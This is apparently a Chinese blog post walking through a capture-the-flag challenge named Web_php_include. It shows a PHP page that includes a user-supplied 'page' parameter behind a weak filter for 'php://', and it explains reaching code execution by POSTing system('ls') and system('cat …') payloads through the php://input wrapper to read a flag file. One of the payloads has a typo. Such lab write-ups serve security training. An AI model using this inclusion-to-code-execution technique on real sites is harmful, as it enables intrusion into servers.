Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
sszdlbw5 小时前
BUUCTF-web刷题篇(19)
web安全·web·安全漏洞·buuctf
sszdlbw1 天前
BUUCTF-web刷题篇(17)
安全·web安全·web·buuctf
sg_knight1 天前
Flutter性能优化终极指南:从JIT到AOT的深度调优
前端·flutter·性能优化·web·dart
sszdlbw2 天前
SSRF漏洞利用的小点总结和实战演练
web安全·web·安全漏洞
禹曦a3 天前
Web开发:常用 HTML 表单标签介绍
前端·html·web
huan666*5 天前
CTF类题目复现总结-hashcat 1
ctf·office文件密码破解·john工具使用
暮湫5 天前
javaWeb axios
java·web
百锦再6 天前
React编程高级主题:错误处理(Error Handling)
前端·javascript·react.js·前端框架·vue·web·angular
ALe要立志成为web糕手8 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
ad禥思妙想8 天前
NSSCTF(MISC)—[justCTF 2020]pdf
ctf·misc